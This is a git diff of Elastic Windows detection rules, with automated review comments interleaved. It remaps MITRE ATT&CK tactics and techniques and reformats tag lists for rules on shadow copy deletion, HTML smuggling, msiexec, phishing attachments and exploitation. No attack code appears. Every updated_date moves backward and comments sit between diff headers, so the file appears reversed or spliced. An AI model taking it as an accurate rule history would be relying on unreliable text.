--- a/rules/windows/impact_ransomware_note_file_over_smb.toml +++ b/rules/windows/impact_ransomware_note_file_over_smb.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/14" [rule] author = ["Elastic"] @@ -55,7 +55,14 @@ note = """## Triage and analysis risk_score = 73 rule_id = "02bab13d-fb14-4d7c-b6fe-4a28874d37c5" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -75,31 +82,36 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + 
diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml index ea585c8adc0..073eef3b42a 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml +++ b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic", "Austin Songer"] @@ -118,31 +118,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml index 16078000044..3298b577ca8 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml 
+++ b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -112,26 +112,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml index 5fa8548e79a..83b0ab0edd9 100644 --- a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml +++ b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
@@ -63,7 +63,14 @@ Hence for this rule to work effectively, users will need to add a custom ingest
 For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 type = "eql"
 query = '''
@@ -104,18 +111,41 @@ sequence by user.id with maxspan=2m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
+[[rule.threat.technique.subtechnique]]
+id = "T1566.001"
+name = "Spearphishing Attachment"
+reference = "https://attack.mitre.org/techniques/T1566/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1566.002"
+name = "Spearphishing Link"
+reference = "https://attack.mitre.org/techniques/T1566/002/"
+
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1027.006"
 name = "HTML Smuggling"
 reference = "https://attack.mitre.org/techniques/T1027/006/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/windows/initial_access_execution_from_inetcache.toml b/rules/windows/initial_access_execution_from_inetcache.toml
index 2d001fa4a96..1c10e770968 100644
--- a/rules/windows/initial_access_execution_from_inetcache.toml
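Review bot: The `tags` hunk drops `"Tactic: Defense Evasion"` while the threat hunk below keeps the TA0005 Defense Evasion `[[rule.threat]]` entry (T1027.006 HTML Smuggling), so the tag list no longer mirrors the tactics declared in `rule.threat`. Either add `"Tactic: Defense Evasion",` after `"Tactic: Initial Access",` in `tags`, or remove the Defense Evasion entry; the other rules in this series carry one `Tactic:` tag per mapped tactic. The two added blank lines before `[rule.threat.tactic]` and the trailing `+` blank line are layout noise relative to the single blank line the surrounding files use between tables.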
+++ b/rules/windows/initial_access_execution_from_inetcache.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/02/14"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/11"
 [rule]
 author = ["Elastic"]
@@ -66,7 +66,21 @@ references = [
 risk_score = 73
 rule_id = "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Tactic: Command and Control",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -99,31 +113,31 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1204"
-name = "User Execution"
-reference = "https://attack.mitre.org/techniques/T1204/"
-
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
 [[rule.threat.technique.subtechnique]]
-id = "T1204.002"
-name = "Malicious File"
-reference = "https://attack.mitre.org/techniques/T1204/002/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "T1566.001"
+name = "Spearphishing Attachment"
+reference = "https://attack.mitre.org/techniques/T1566/001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1189"
-name = "Drive-by Compromise"
-reference = "https://attack.mitre.org/techniques/T1189/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
diff --git a/rules/windows/initial_access_execution_from_removable_media.toml b/rules/windows/initial_access_execution_from_removable_media.toml
index 202f92da7e0..839778a74ba 100644
--- a/rules/windows/initial_access_execution_from_removable_media.toml
+++ b/rules/windows/initial_access_execution_from_removable_media.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/09/27"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 [rule]
 author = ["Elastic"]
@@ -19,7 +19,14 @@ name = "Execution from a Removable Media with Network Connection"
 risk_score = 21
 rule_id = "1542fa53-955e-4330-8e4d-b2d812adeb5f"
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 type = "eql"
 query = '''
@@ -73,26 +80,14 @@ Removable media, like USB drives, are often used for data transfer but can be ex
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1091"
 name = "Replication Through Removable Media"
 reference = "https://attack.mitre.org/techniques/T1091/"
+
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1091"
-name = "Replication Through Removable Media"
-reference = "https://attack.mitre.org/techniques/T1091/"
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/windows/initial_access_execution_remote_via_msiexec.toml b/rules/windows/initial_access_execution_remote_via_msiexec.toml
index 63ecc9b7169..313b2343f65 100644
--- a/rules/windows/initial_access_execution_remote_via_msiexec.toml
+++ b/rules/windows/initial_access_execution_remote_via_msiexec.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/09/28"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 [rule]
 author = ["Elastic"]
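Review bot: The second `[[rule.threat]]` entry removed in the threat hunk (T1091 under TA0008 Lateral Movement) was not a duplicate of the first: ATT&CK lists Replication Through Removable Media under both Initial Access and Lateral Movement, so the rule loses a legitimate tactic mapping along with its `"Tactic: Lateral Movement"` tag. If the entry was dropped to satisfy a duplicate-tactic check, that check is per tactic, not per technique, and the original two entries would have passed it. Suggest restoring the TA0008 entry and the tag unless the narrowing to Initial Access is deliberate.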
@@ -18,7 +18,15 @@ name = "Potential Remote File Execution via MSIEXEC"
 risk_score = 21
 rule_id = "3e441bdb-596c-44fd-8628-2cfdf4516ada"
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 type = "eql"
 query = '''
@@ -93,18 +101,36 @@ MSIEXEC, the Windows Installer, facilitates software installation, modification,
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
+[[rule.threat.technique.subtechnique]]
+id = "T1566.002"
+name = "Spearphishing Link"
+reference = "https://attack.mitre.org/techniques/T1566/002/"
+
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1218"
 name = "System Binary Proxy Execution"
 reference = "https://attack.mitre.org/techniques/T1218/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1218.007"
 name = "Msiexec"
 reference = "https://attack.mitre.org/techniques/T1218/007/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/windows/initial_access_execution_via_office_addins.toml b/rules/windows/initial_access_execution_via_office_addins.toml
index 4ee5330946f..ce76d88f67f 100644
--- a/rules/windows/initial_access_execution_via_office_addins.toml
+++ b/rules/windows/initial_access_execution_via_office_addins.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/03/20"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -63,7 +63,19 @@ references = [
 risk_score = 47
 rule_id = "ae8a142c-6a1d-4918-bea7-0b617e99ecfa"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Tactic: Persistence",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -113,36 +125,36 @@ process where
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1204"
-name = "User Execution"
-reference = "https://attack.mitre.org/techniques/T1204/"
-
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
 [[rule.threat.technique.subtechnique]]
-id = "T1204.002"
-name = "Malicious File"
-reference = "https://attack.mitre.org/techniques/T1204/002/"
+id = "T1566.001"
+name = "Spearphishing Attachment"
+reference = "https://attack.mitre.org/techniques/T1566/001/"
+
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1137"
 name = "Office Application Startup"
 reference = "https://attack.mitre.org/techniques/T1137/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1137.006"
 name = "Add-ins"
 reference = "https://attack.mitre.org/techniques/T1137/006/"
+
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
diff --git a/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml b/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml
index 90fbf00b319..c85bc4e1719 100644
--- a/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml
+++ b/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/03/16"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -84,6 +84,36 @@ event.category:"registry" and host.os.type:"windows" and registry.value:"Friendl
 '''
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1091"
+name = "Replication Through Removable Media"
+reference = "https://attack.mitre.org/techniques/T1091/"
+
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1052"
+name = "Exfiltration Over Physical Medium"
+reference = "https://attack.mitre.org/techniques/T1052/"
+[[rule.threat.technique.subtechnique]]
+id = "T1052.001"
+name = "Exfiltration over USB"
+reference = "https://attack.mitre.org/techniques/T1052/001/"
+
+
+
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["registry.path"]
diff --git a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml
index 51e89480805..61e732cb424 100644
--- a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml
+++ b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/24"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
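Review bot: This rule's `tags` line is not touched by the diff, yet two tactics (TA0001 Initial Access and TA0010 Exfiltration) are added to `rule.threat` in this hunk; every other rule in the series changes `tags` together with the mappings, so it should be confirmed that the untouched tag list already carries `"Tactic: Initial Access"` and `"Tactic: Exfiltration"`, otherwise the two now disagree. The three consecutive blank lines before the TA0010 `[rule.threat.tactic]` table and the two before the TA0001 one are layout noise; one blank line between tables matches the existing rules.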
@@ -71,7 +71,20 @@ references = [
 risk_score = 47
 rule_id = "730ed57d-ae0f-444f-af50-78708b57edd5"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Tactic: Execution", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Data Source: Elastic Endgame",
+ "Use Case: Vulnerability",
+ "Data Source: Elastic Defend",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
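Review bot: `tags` now lists only `"Tactic: Initial Access"`, but the threat hunk that follows keeps a second `[[rule.threat]]` entry whose tactic is TA0002 Execution (T1059 with the PowerShell and Windows Command Shell sub-techniques), so `"Tactic: Execution",` should remain in the list after `"Tactic: Initial Access",`. The dropped `Tactic: Defense Evasion` and `Tactic: Discovery` tags do correspond to mappings removed below, so those removals are consistent.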
@@ -97,58 +110,22 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1016"
-name = "System Network Configuration Discovery"
-reference = "https://attack.mitre.org/techniques/T1016/"
-
 [[rule.threat.technique]]
-id = "T1033"
-name = "System Owner/User Discovery"
-reference = "https://attack.mitre.org/techniques/T1033/"
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
-[[rule.threat.technique]]
-id = "T1057"
-name = "Process Discovery"
-reference = "https://attack.mitre.org/techniques/T1057/"
-
-[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
 [rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
-
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1047"
-name = "Windows Management Instrumentation"
-reference = "https://attack.mitre.org/techniques/T1047/"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
@@ -159,7 +136,10 @@ id = "T1059.003"
 name = "Windows Command Shell"
 reference = "https://attack.mitre.org/techniques/T1059/003/"
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml
index f9db67a7a6b..018003de5eb 100644
--- a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml
+++ b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/02"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/09"
 [rule]
 author = ["Elastic"]
@@ -65,7 +65,15 @@ references = [
 risk_score = 73
 rule_id = "a4f7a295-aba1-4382-9c00-f7b02097acbc"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Use Case: Vulnerability",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -84,46 +92,14 @@ any where host.os.type == "windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
-[[rule.threat.technique.subtechnique]]
-id = "T1218.011"
-name = "Rundll32"
-reference = "https://attack.mitre.org/techniques/T1218/011/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.003"
-name = "Windows Command Shell"
-reference = "https://attack.mitre.org/techniques/T1059/003/"
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat.technique]]
-id = "T1129"
-name = "Shared Modules"
-reference = "https://attack.mitre.org/techniques/T1129/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/windows/initial_access_rdp_file_mail_attachment.toml b/rules/windows/initial_access_rdp_file_mail_attachment.toml
index f34cb7ca06e..f7ff84102c4 100644
--- a/rules/windows/initial_access_rdp_file_mail_attachment.toml
+++ b/rules/windows/initial_access_rdp_file_mail_attachment.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/05"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/08/26"
 [rule]
 author = ["Elastic"]
@@ -68,7 +68,21 @@ references = [
 risk_score = 47
 rule_id = "f401a0e3-5eeb-4591-969a-f435488e7d12"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Tactic: Command and Control",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -86,18 +100,19 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1204"
-name = "User Execution"
-reference = "https://attack.mitre.org/techniques/T1204/"
-
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
 [[rule.threat.technique.subtechnique]]
-id = "T1204.002"
-name = "Malicious File"
-reference = "https://attack.mitre.org/techniques/T1204/002/"
+id = "T1566.001"
+name = "Spearphishing Attachment"
+reference = "https://attack.mitre.org/techniques/T1566/001/"
+
+
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+
diff --git a/rules/windows/initial_access_script_executing_powershell.toml b/rules/windows/initial_access_script_executing_powershell.toml
index cfc016b1525..7ec8d133027 100644
--- a/rules/windows/initial_access_script_executing_powershell.toml
+++ b/rules/windows/initial_access_script_executing_powershell.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
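Review bot: The preceding `tags` hunk adds `"Tactic: Command and Control"`, but the threat section rewritten here maps only TA0001 Initial Access (T1566.001) and the hunk's trailing context shows no further `[[rule.threat]]` table, so that tag appears to have no matching mapping in `rule.threat`. Either add a Command and Control entry (the inetcache rule earlier in this diff pairs the same tag with T1105 / TA0011) or drop the tag. The two added blank lines before `[rule.threat.tactic]` and the trailing `+` blank line are layout noise compared with the single blank line the other rules use between tables.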
@@ -76,7 +76,19 @@ references = ["https://www.elastic.co/security-labs/operation-bleeding-bear"]
 risk_score = 21
 rule_id = "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc"
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Tactic: Execution",
+ "Resources: Investigation Guide",
